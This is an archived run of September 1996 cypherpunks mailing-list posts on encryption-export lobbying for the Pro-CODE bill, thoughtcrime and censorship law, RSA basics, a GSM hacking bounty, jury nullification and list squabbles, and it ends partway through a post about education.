On Tue, 10 Sep 1996 13:35:52 +0200 (METDST), Asgaard wrote:

>> is viewed as being essentially Mexican.  (Some great humor, too. And a good
>> murder mystery. And a love story. Conspiracy, humor, murder, love...all the
>> ingredients of a great story. All three major American races collide, and
>
>I think the love ingredients, all too common in movies without adding
>anything to the real story, are a pain in the behind. I usually channel-
>surf during the coitus scene (one in every movie for the last year).

"We've just barely managed to escape the transdimensional alien demon spawn. 
We're bruised and exhausted.  Let's make love in this ditch and hope the
alien's Nazi henchmen don't find us!"

And people say Hollywood retains even a touch of reality. . .


# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Wed, 11 Sep 1996 15:49:43 +0800
To: "'cypherpunks@toad.com>
Subject: FW: Child Porn as Thoughtcrime
Message-ID: <01BB9F6A.50D05180@king1-03.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Blanc, responding to herself (a la Detweiler - NOT)

>Many people seek after sympathy towards their feelings (present and/or future
>pain) more than to be respected for the ability to think.   I imagine this
>develops into a reduced sympathy towards certain kinds of thought or towards
>thinking per se, eventually, promoting a general atmosphere of tolerance for
>offenses like "thoughtcrimes".   
................................................................


This statement is entirely wrong and totally false.

What I really meant to say, rather than "tolerance for offenses like...", was that there is created an atmosphere which is tolerant towards classifying certain kinds of thinking as "thought crimes".   And once it is allowed that some types of thoughts, or some types of thinking, are classifiable as criminally offensive, I expect most anyone on this list can extrapolate the consequences of such a development upon the collective conscience.

   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 11 Sep 1996 16:01:17 +0800
To: cypherpunks@toad.com
Subject: Re: Conjuring up the latest utopia for a minoritarian sect of illuminati
Message-ID: <ae5ba32805021004b044@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:46 AM 9/11/96, Dr.Dimitri Vulis KOTM wrote:
>tcmay@got.net (Timothy C. May) writes:
>> I didn't call for your "expulsion." No one has been expelled in four years
>> of the list's existence.
>
>However Tim has been complaining about my postings to various people I know
>and respect. (I stopped respecting Tim years ago.)

And who might these people be? I suggest you name them, as I have not even
mentioned your name to anyone. You don't rate a complaint from me.

--TCM

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scrappo.reverb@juno.com (A L)
Date: Wed, 11 Sep 1996 18:29:28 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19960910.225608.8159.0.scrappo.reverb@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


I apologize for any behavior on behalf of my domain name.
(A little background:)
I am a cryptographer hopeful. I was interested in such
things as the Caesar Cypher and the Enigma machine and the
Roman encryption "padlock" when other kids were more
interested in how the water fountain shot water straight up. 
After some thought and a little writing, I developed 
an encryption program using Mallard Basic on an old
Amstrad (which I still grudgingly keep) with programming 
skills I taught myself.
 I know most of the basics regarding RSA, PGP, and 
assorted single pass (?) cyphers. One thing I do not 
understand has to do with how RSA sieves large primes, 
etc. That is one of the few things that I do not 
understand about RSA. Another aspect of RSA I do not 
understand is the usage of primes (or any number) in the 
actual encryption process. Does the program add numbers 
from the key to the plaintext to create the cyphertext, or 
does it use some other process.
I am sorry if any of these questions seem redundant and/or
stupid, but at this point in time, I can't get my hands on 
any actual explanation for how it works. (I would get a
copy of "Applied Cryptography," but I do not have any
source of income, which also explains Juno.)
Aiieee!!! the dreaded "J" word!
Once again, I apologize if any of this caused annoyance
or sickness.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Wed, 11 Sep 1996 15:30:14 +0800
To: cypherpunks@toad.com
Subject: ALERT: Call the Commerce committee!  The White House is fighting us! (9/10/96)
Message-ID: <199609110442.AAA10980@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


========================================================================

           SENATE COMMERCE COMMITTEE VOTE TOMORROW IN QUESTION
       	     WHITE HOUSE STALLING; THE NET CAN SAVE THE VOTE

		OFFICES ARE RECEIVING 'LOTS OF CALLS'
                MAKE A CALL TO THE COMMERCE COMMITTEE 

	               	 September 11, 1996

      Please widely redistribute this document with this banner intact
			until September 30, 1996

________________________________________________________________________
CONTENTS
	The Latest News
	What You Can Do Now
	Background / What To Expect This Week
	Description of S.1726, Pro-CODE Bill
	Chronology of Pro-Crypto Legislation
	For More Information / Supporting Organizations

________________________________________________________________________
THE LATEST NEWS

Sometimes things work out better than imagined.  This was the feeling
tonight as I waded through my email from people all over the country that
called the commerce committee.  This was the feeling as I heard from visitors
to one Senator's office who, while waiting for a few minutes in the lobby,
listened to the receptionist take two quick calls from netizens calling
about the bill.

Receptionist, cutting the caller off: "S.1726?  Yes, I'll pass that along
to the Senator, thanks.  We've been getting a lot of calls."

Another netizen emailed us saying that he also called his Representative.
It turns out this Rep. has some friends who have co-sponsored HR 3011, the
House version of Pro-CODE.  The calls and elevated publicity from this phone
campaign have convinced him to consider co-sponsoring HR 3011.

This is great, but our success has mobilized the anti-crypto forces
into action as well.  The Clinton Administration, who has long opposed
the right of citizens to use non-Clipper encryption, has begun working
behind the scenes to make sure that the vote on Pro-CODE (S.1726) never
happens.

To have the Senate Commerce committee go on record that encryption exports
should be loosened, against the will of the Administration, would be
an embarrassment to the White House.  They have begun pushing hard to
pressure Democratic Commerce Committee members to put the brakes on the
bill, and do everything they can to prevent the vote this Thursday.

To see the business community, the industry, and the public line up the
Administration would be extremely hard to take and still seem
credible.

It's crucial that we continue to make noise and ring those phones.  By
pulling enough favors with members of the Senate Commerce Committee, it's
possible that the White House could prevent this vote from happening.

WE MUST NOT LET THAT HAPPEN.  Appropriately forward this to everyone you
know until the expiration listed above.  Go to work, bug your neighbor
in the cubicle or office next to you.  Have they called yet?  Bug them
until they do.  Call the rest of the members you haven't gotten around to
yet.

And don't forget to sign the petition at http://www.crypto.com/petition/ !

[Rest of alert is the same from last time]
________________________________________________________________________
WHAT YOU CAN DO NOW

It's crucial that you call the Commerce committee members below and
urge them to pass S.1726 out of committee without amendments.  (This is
also known as a "clean" bill.)  Any opportunity for amendments (even if
they are good) opens us up to the possibility of hostile amendments
that could restrict the use of encryption even further than today's
abysmal state.  It could even prohibit the use of encryption without
Clipper Chip-like key 'escrow' technology, which includes built-in
surveillance and monitoring functionality.

1. Call/Fax the members of the Senate Commerce committee and urge
   them to pass S.1726 out of committee "cleanly".  Do not use email,
   as it is not likely to be looked at in time to make a difference
   for the markup on September 12th.

   Use the sample communique and directory listing below to make it a
   simple TWO MINUTE task.

2. Sign the petition to support strong encryption at
   http://www.crypto.com/petition/   !  Join other cyber-heroes as
   Phil Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and
   others who have also signed.

3. Between now and Wed. September 12, it is crucial that you call all
   these members of Congress.

      P ST Name and Address           Phone           Fax
      = == ========================   ==============  ==============
      D SC Hollings, Ernest F.        1-202-224-6121  1-202-224-4293
      D MA Kerry, John F.             1-202-224-2742  1-202-224-8525
      D HI Inouye, Daniel K.          1-202-224-3934  1-202-224-6747
      D KY Ford, Wendell H.           1-202-224-4343  1-202-224-0046
      D WV Rockefeller, John D.       1-202-224-6472  1-202-224-7665
      D LA Breaux, John B.            1-202-224-4623  1-202-228-2577
      D NV Bryan, Richard H.          1-202-224-6244  1-202-224-1867
      D ND Dorgan, Byron L.           1-202-224-2551  1-202-224-1193
      D NE Exon, J. J.                1-202-224-4224  1-202-224-5213
      D OR Wyden, Ron*                1-202-224-5244  1-202-228-2717

      R SD Pressler, Larry*           1-202-224-5842  1-202-224-1259
      R MT Burns, Conrad R.(*sponsor) 1-202-224-2644  1-202-224-8594
      R AK Stevens, Ted               1-202-224-3004  1-202-224-2354
      R AZ McCain, John               1-202-224-2235  1-202-228-2862
      R WA Gorton, Slade              1-202-224-3441  1-202-224-9393
      R MS Lott, Trent*               1-202-224-6253  1-202-224-2262
      R TX Hutchison, Kay Bailey      1-202-224-5922  1-202-224-0776
      R ME Snowe, Olympia             1-202-224-5344  1-202-224-1946
      R MO Ashcroft, John*            1-202-224-6154  1-202-228-0998
      R TN Frist, Bill                1-202-224-3344  1-202-228-1264
      R MI Abraham, Spencer           1-202-224-4822  1-202-224-8834

	* supporter or cosponsor.  The bill also enjoys broad bi-partisan
	support from members not on the committee including Senators Leahy
	(D-VT) and Murray (D-WA).

4. Here is a sample conversation:

   SAMPLE PHONE CALL
	You:<ring ring>
	Sen:Hello, Senator Mojo's office!

	You:

SAY     I'm calling to urge the Senator to pass S.1726, the 
THIS-> 	Burns/Leahy/Pressler bill, S.1726 when the committee votes on
	it on Thursday.  It's critical to the future of privacy, security,
	and electronic commerce on the internet.

	Sen:Ok, thanks!<click>

   IF THEY SAY
	"The Senator has concerns about the bill",
   please answer,
   	"Please try to work these issues out as it moves to the Senate floor,
	 but passage out of committee will send an important signal to
	 the Administration."

5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR FROM
   YOU.  Please tell us who you called, and how they sounded.  We'll be
   passing this information to folks in D.C. who can help apply pressure
   where needed.

 	$ Mail vtw@vtw.org
	Subject: I called so-and-so

	Hey, I called Sen. Mojo.  He sounded iffy, call in the
	reinforcements.
	^D

6. Forward this to your friends and colleagues in appropriate forums
   until the date of expiration at the top.  Forward a copy of this to
   your Internet Service Provider as well, and ask them to put the following
   text in their message of the day (motd), or on their WWW page:

	ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT

	The U.S. Senate will be voting on a proposal to encourage
	better security on the Internet on Thu Sep. 12th.  Your help is
	needed to call Congress.  See http://www.crypto.com/ for more
	details.

	ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT

________________________________________________________________________
BACKGROUND / WHAT TO EXPECT THIS WEEK

For the past 3 years, Cyber-Rights Activists, citizens, and industry
leaders have been working hard to reform US encryption policy.

Support has been building behind several legislative proposals this
year because they send a clear signal to the Administration about the
need for security and privacy in the Information Age.  The digital
revolution is currently being held hostage by the White House's Cold
War restrictions on privacy-enhancing encryption technology.

Now, with Congress less than a month away from adjournment, everyone
who supports encryption and privacy is working to see this bill leave
committee in order to send a clear message to the White House that they
are on the wrong side of the encryption issue.  Although this bill may
not become law this year, its passage out of committee will be a
landmark event that will clearly tell the White House that the
Congress, the public, and the computer industry care about security and
privacy, and need strong, reliable encryption technology in order to
make the Internet a viable platform for commerce, education, and
democracy.

Success for our side is not certain, and the next week is not without risks.
On September 12th, the Senate Commerce committee will hold a "markup",
where the bill is examined, voted on, and if there are enough votes,
passed out of committee.  Two things could happen:

	-the committee could pass the bill as written,
	-the committee could pass the bill with amendments.

Any amendments are not likely to be friendly, and in particular, quiet
sources have told privacy activists that the Clinton Administration has been
readying a legislative assault on your right to use encryption for several
weeks now.  A Clipper-like amendment could be attached to the bill if
our side does not have enough votes to block all amendments.

It is crucial that all netizens who consider privacy and security important
take a moment to call members of the Commerce Committee right now and
urge them to vote S.1726 out of committee without amendments.

________________________________________________________________________
DESCRIPTION OF S.1726, PRO-CODE BILL

Privacy-enhancing encryption technology is currently under heavy restrictions
kept in place by the White House.  Encryption that is currently allowed to
be exported is not sufficient to protect confidential information.  This
policy acquires an "Alice-in-Wonderland" quality when one realizes that  
strong encryption products are available abroad both for sale and for free
download off the Internet.

The Pro-CODE Act resolves to:

1.  Allow for the *unrestricted* export of "mass-market" or "public-domain"
    encryption programs, including such products as Pretty Good Privacy and
    popular World Wide Web browsers.

2.  Requires the Secretary of Commerce to allow the less restricted export
    of other encryption technologies if products of similar strength are
    generally available outside the United States, roughly up to DES
    strength.

3.  Prohibits the federal government from imposing mandatory key-escrow
    encryption policies on the domestic market and limiting the authority
    of the Secretary of Commerce to set standards for encryption products.

________________________________________________________________________
CHRONOLOGY OF PRO-CRYPTO LEGISLATION

9/12/96 (scheduled)
Senate Commerce committee will hold markup of S.1726 and hopefully pass it
out of committee with no amendments.

7/25/96: Full Senate Commerce committee holds positive hearings on S.1726.
FBI Director Louis Freeh testifies along with many cyber-luminaries.
Hearings are cybercast Internet Cyber-Rights activists with HotWired
and WWW.Crypto.Com.  You can see the photos, read the testimony, and
listen to the audio transcript at http://www.crypto.com/events/072596/

6/26/96: Senate subcommittee holds positive hearings on S.1726.  Hearings are
cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com.
You can see the photos, read the testimony, and listen to the audio
transcript at http://www.crypto.com/events/062696/

5/2/96: Bi-partisan group of Senators introduce Pro-CODE Act, which would
free public-domain encryption software (such as PGP) for export, free much
commercial encryption for export, and reduce the government's ability to
push Clipper proposals down the throats of an unwilling public.  Original
sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC),
Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR).

3/5/96: Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills
(S.1587/H.R.3011) that significantly relax export restrictions on products
with encryption functionality in them, as well as free public domain software
such as PGP (Pretty Good Privacy).

________________________________________________________________________
FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS

There are many excellent resources online to get up to speed on crypto
including the following WWW sites:

http://www.crypto.com       http://www.privacy.org    http://www.eff.org    
http://www.cdt.org          http://www.epic.org       http://www.vtw.org

Please visit them often.

The following organizations have signed onto this alert:

	Center for Democracy and Technology
	Electronic Frontier Foundation
	Electronic Privacy Information Center
	Voters Telecommunications Watch

________________________________________________________________________
End alert
========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 11 Sep 1996 17:51:24 +0800
To: cypherpunks@toad.com
Subject: (Fnord) Edupage, 10 September 1996
Message-ID: <199609110733.DAA04996@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Chances are this already made it to the list... 

------- Forwarded Message Follows -------
************************************************************
Edupage, 10 September 1996.  Edupage, a summary of news about information
technology, is provided three times a week as a service by Educom,
a Washington, D.C.-based consortium of leading colleges and universities
seeking to transform education through the use of information technology.
************************************************************

TOP STORIES
        Wired World Will "Diminish National Sovereignty"
[..]
WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY"
A leading Clinton Administration official on information security and
cryptography matters says that traditional notions of sovereignty, national
security and warfare will be undermined by the year 2020, when the whole
world is "wired" and e-cash is the norm.  The result will be less powerful
governments in relation to criminal organizations such as the Mafia and
international drug cartels, says Michael Nelson, who adds that organized
crime members are already some of the most sophisticated users of computer
systems and strong encryption technology.  In addition, computer crackers
will pose a more significant threat.  In response, Nelson advocates
resolving the issue of whether unauthorized access of a computer is an "act
of trespass" or an "act of war," and prosecuting the intrusions accordingly.
(BNA Daily Report for Executives 6 Sep 96 A14)

[..]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Wed, 11 Sep 1996 19:14:21 +0800
To: cypherpunks@toad.com
Subject: Please don't killfile juno.com
Message-ID: <199609110846.EAA22788@interport.net>
MIME-Version: 1.0
Content-Type: text/plain



  Looks to me like there's at least one person at Juno who's
interested in serious crypto.  This message just appeared on the
list, but I'm forwarding it in case anyone's actually killfiled
the site.


---begin forward---


> I apologize for any behavior on behalf of my domain name.

> (A little background:)

> I am a cryptographer hopeful. I was interested in such things
> as the Caesar Cypher and the Enigma machine and the Roman
> encryption "padlock" when other kids were more interested in
> how the water fountain shot water straight up.  After some
> thought and a little writing, I developed an encryption
> program using Mallard Basic on an old Amstrad (which I still
> grudgingly keep) with programming skills I taught myself.

>  I know most of the basics regarding RSA, PGP, and assorted
> single pass (?) cyphers. One thing I do not understand has to
> do with how RSA sieves large primes, etc. That is one of the
> few things that I do not understand about RSA. Another aspect
> of RSA I do not understand is the usage of primes (or any
> number) in the actual encryption process. Does the program add
> numbers from the key to the plaintext to create the
> cyphertext, or does it use some other process.

> I am sorry if any of these questions seem redundant and/or
> stupid, but at this point in time, I can't get my hands on any
> actual explanation for how it works. (I would get a copy of
> "Applied Cryptography," but I do not have any source of
> income, which also explains Juno.) Aiieee!!! the dreaded "J"
> word!

> Once again, I apologize if any of this caused annoyance or
> sickness.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Skonk <Skonk@alpha.c2.org>
Date: Wed, 11 Sep 1996 15:37:34 +0800
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <3236424B.12E5@alpha.c2.org>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Wed, 11 Sep 1996 22:50:07 +0800
To: gary@systemics.com
Subject: Re: TWA 800 - Serious thread.
Message-ID: <199609111143.HAA42252@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: gary@systemics.com, cypherpunks@toad.com
Date: Wed Sep 11 07:41:52 1996
Gary wrote:

<...>

> Ah, but isn't "jury selection" the process of selecting those that
>  don't
> know they are judging the law as well as the case?

But Gary, don't you see that's good? We need to get laws *back* against 
witches, against fugitive slaves, against forming unions, against drinking 
alcohol, etc. and truth certainly shouldn't be an absolute defense against 
libel! "Our" country is slowly lapsing into anarchy, and would likely go 
even further if we didn't have the moral Exons, Packwoods, Clintons, and 
Rostenkowskis to lead us and protect us!
[For those who don't know me, I'm being sarcastic.]
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"As govt.s grow arithmetically, corruption grows exponentially."
 -- Ray's Law of official corruption.

 Defeat the Duopoly!             Stop the Browne out.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjalhW1lp8bpvW01AQHgLwP/Y2wSCTCqt9BDeGlcCyde3UMHb5VwthKB
0axWAEsQgdL9sDwbAlT8H1nT36q6ofBf6Hk97KB8eL5SnLQgBjA1xMMNVc2IBcFm
gG8+k4Y9PndEzvYO+HreYVYEF8TFB/WhZt42mYm7ZzpkHHok3iMEHIW3ZpEzPlxc
cJVATpNS6NA=
=i6Nw
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 11 Sep 1996 19:40:23 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: TWA 800 - Serious thread.
In-Reply-To: <2.2.32.19960910190024.007245e4@pop.ricochet.net>
Message-ID: <32367F80.41C67EA6@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles wrote:
> 
> At 03:30 PM 9/9/96 -0700, Dale Thorn wrote:
> 
> >If govt. protects its "sources and methods", however nefarious, to the
> >extent that the public is never asked to assent to these methods (even
> >though a few of us know about them anyway), then the public doesn't have
> >to become overtly cynical about what's going on.
> 
> But the public *is* asked to assent to those methods - your chance to vote
> on them is known colloquially as "jury duty".

Ah, but isn't "jury selection" the process of selecting those that don't
know they are judging the law as well as the case?

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Wed, 11 Sep 1996 20:33:22 +0800
To: cypherpunks@toad.com
Subject: Digital rights organisation
Message-ID: <Pine.LNX.3.94.960911114214.9031B-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

thinking about what happend in Germany,
are there any 'digital rights' organisations
in Germany ?

If not, we would like to found one. 
Are there any international orgs (EFF?,...)
who can help us ? 

What goals do they have ?

To Germans: 
How do I found an e.V. in Germany ?

Thanks for the help in advance,

-stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Wed, 11 Sep 1996 23:50:30 +0800
To: cypherpunks@toad.com
Subject: Hacking Mobil Telephone System ?
Message-ID: <Pine.LNX.3.94.960911135638.12738A-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain



Allgaeuer Zeitung, 9.9.96 says:
(A German newspaper)

The German Company MobilCom wants to proove
that the German GSM networks D1,D2 and E+ are
secure.

There have been rumors that it's possible to
phone with a hacked code.

If a hacker is able to phone using the number
0171 / 3 28 99 66 in Germany with a hacked code,
the company will pay 100.000 DM (~65.000$) to a non
profit organisation of the hackers choice.

Is someone able to do this ? :)

(No responsibility taken for the translation.)

-stephan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 11 Sep 1996 20:26:04 +0800
To: fconley@astro.ocis.temple.edu (fconley)
Subject: Re: LACC: Bernie S. attacked in prison
In-Reply-To: <199609101648.MAA06069@astro.ocis.temple.edu>
Message-ID: <199609110936.TAA15567@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> >Of course. Surprising or shocking? Not in the least.
> >
> >				Nico Garcia
> >				raoul@tiac.net
> 
> Every day that I wake up, I'm amazed at how far this country has 
> devolved. When rational people sit quietly and accept the abuses of the 
> police and other authorities, it is a sign that society has truly turned 
> belly-up.

I was shocked.

I've had some dealings with the SS. Their behavior in court, painting Ed
as a "terrorist" was to be expected, NOT condoned. What happened to Ed in
prison is shocking. If Ed was a killer of little children, then I could
understand. He wasn't. At his worst Ed's crime was no more than petty
white collar fraud. Ed would not have been imprisoned in Australia.

I've reviewed many US computer crime / toll fraud cases, including
sentencing decisions. I found myself very unimpressed with US sentencing
guidelines, which are extremely rigid and compartmentalised, leaving
a sentencing judge with almost no disgression or ability to impose
a sentence that fits the crime as a whole or the defendant as a whole.

Whether Nico or anyone else found the violence against Cummings
"shocking" or "to be expected" or not, is of no import. No one is
surprised to hear that a pretty girl walking alone through central park
in the middle of the night has been brutally raped. This makes the
crime, and its effects on the victim no less hideous. Those that abuse
their power and inflict grave violence on others must be held
accountable and their crimes deplored and punished in the strongest
manner. Failure to do so merely creates an environment where such
behavior becomes predominant. This is not acceptable.

--
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "MacGyver" <macgyver@colphi.edu.ar>
Date: Fri, 13 Sep 1996 12:17:17 +0800
To: cypherpunks@toad.com
Subject: Security technical list
Message-ID: <409if995@colphi.edu.ar>
MIME-Version: 1.0
Content-Type: text/plain


[pgp sign clear]
Anybody could help me to find a mail list of security,crypto,etc??

Regards




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Y Do U Care <hevnsnt@ksu.edu>
Date: Thu, 12 Sep 1996 00:00:54 +0800
To: Julian Assange <proff@suburbia.net>
Subject: Re: hackerlist
In-Reply-To: <199609011450.AAA22573@suburbia.net>
Message-ID: <Pine.SOL.3.91.960910230451.17011B-100000@cbs.ksu.ksu.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 2 Sep 1996, Julian Assange wrote:

> > I am planning to make a list of hackers and would appreciatte it if you
> > would e-mail me with the following information.
> > handle
> > e-mail
> > city,state
> > url
> > whether or not you would like to recieve the list when finished
> >                                    thanks for your help
> >     P. Cummings
> >     Patrickbc@juno.com
> 
> Are you on this list of morons?

I can hardly wait for the big rush of everyone sending in their
names on this one.. haha buddy... I wouldnt wait up.
                                -HevnScenT




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Thu, 12 Sep 1996 03:02:37 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Child Porn as Thoughtcrime
In-Reply-To: <Pine.SUN.3.91.960910203403.13178D-100000@eff.org>
Message-ID: <3236A627.510F@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:

> > Q: Is a collage of images of little girls (or boys, one presumes) in
> > swimsuits, with apparent salacious intent, illegal?
> 
> Under the Knox decision, yes. (Dancing girls in leotards are verboten.)

Is this going to have some implications for broadcast of the women's
gymnastic events in the next Olympics?

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Thu, 12 Sep 1996 03:56:20 +0800
To: cypherpunks@toad.com
Subject: 'robert' and his 'hipcrime' web site
Message-ID: <199609111609.JAA25770@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Have you considered who is funding this "hipcrime" site?  Web sites aren't
terribly expensive these days, but someone paid at least a few hundred
dollars in set-up fees for this.  Now, I realize that most artists really
just like to draw, and will spend money on their art projects without
expecting any kind of benefit; that is not unusual.  What is unusual is
the disclaimer and its corporate mentailty, and the "anarchist info".

It's obvious that this guy's true passion is fractals and raytracing.  
He threw in some bomb-making stuff, but he scanned it out of a book and
probably never tried it.  Compared to the rest of the site, it looks like
an afterthought.  Someone who was really interested in chemistry would
have taken the time to retype the info and add their own comments.  He
had a reason to have some "anarchist" info on there but he's not really
interested in it.  So basically this guy is a mathematician/artist trying
to pretend he's an anarchist.

Same goes for the remailers.  He claims he likes remailers and anonymity,
but he's lying.  Anyone who really liked remailers/anonymity/privacy would
have pages and pages about how to use remailers, and why privacy is a good
thing.  He has a reason he needs to be anonymous, but it's not because
he supports privacy.  He publishes a PGP key, because he wants to pretend
he's an anarchist, and Louis Freeh told him that all evil terrorist
organizations use PGP.  But he doesn't like PGP, he doesn't advocate PGP,
and he doesn't tell you where to get PGP.

So we have a guy, probably with an education in mathematics, who likes
abstract art.  Not what would generally be considered a political figure.
But there's something else there - something that doesn't want to be seen,
something that is very strongly law&order, something that doesn't
understand the anarchy of the net, and fears it.  Something that has the
money to fund lots of little pet projects.  Is robert@precipice.v-site.net
just a useful idiot who found someone who will fund his fractal creations?
Or is he a willing participant?  I guess it doesn't matter really.

Someone here doesn't like us... didn't like us before Hipcrime went online,
and still doesn't like us.  But now at least he's got our attention.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Thu, 12 Sep 1996 03:06:00 +0800
To: Gary Howland <gary@systemics.com>
Subject: [RANT]Education: Was Re: TWA 800 - Serious thread.
In-Reply-To: <32367F80.41C67EA6@systemics.com>
Message-ID: <199609111444.JAA13035@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <32367F80.41C67EA6@systemics.com>, on 09/11/96 at 10:59 AM,
   Gary Howland <gary@systemics.com> said:

>Greg Broiles wrote:
>> 
>> At 03:30 PM 9/9/96 -0700, Dale Thorn wrote:
>> 
>> >If govt. protects its "sources and methods", however nefarious, to the
>> >extent that the public is never asked to assent to these methods (even
>> >though a few of us know about them anyway), then the public doesn't have
>> >to become overtly cynical about what's going on.
>> 
>> But the public *is* asked to assent to those methods - your chance to vote
>> on them is known colloquially as "jury duty".

>Ah, but isn't "jury selection" the process of selecting those that don't
>know they are judging the law as well as the case?

The form of Government that our Founding Fathers created here in the US was based on
the principle that the citizens were educated, informed, God fearing people with
solid moral principles.

We no longer have such a society if we ever did.

Our citizens are for the most part uneducated, ill-informed, with the moral fiber
that back in 1776 would have found the whole lot of them in stocks in the town
square.

The two major cause of this have been public education & TV.

Now before I get flamed here let me explain my position. :)

Over the past 40-50 yrs. public education has been going down hill. To receive the
education that was once received from 12 yrs of school now requires 16 yrs. We are
graduating greater and greater numbers of students that do not have the basic skills
to survive in the workplace.

There is little or no instruction on government, law, or the Constitution in school.
The majority of citizens are ignorant of the law, of the Constitution (both State &
Federal), of their local government. Incase you doubt this go out and ask some of
your fellow citizens who is on their town counsel, county boards, state
representatives. Ask them how local judges are selected. Who are their local judges
and what are their positions on key political issues.

Now on moral fiber & God fearing:

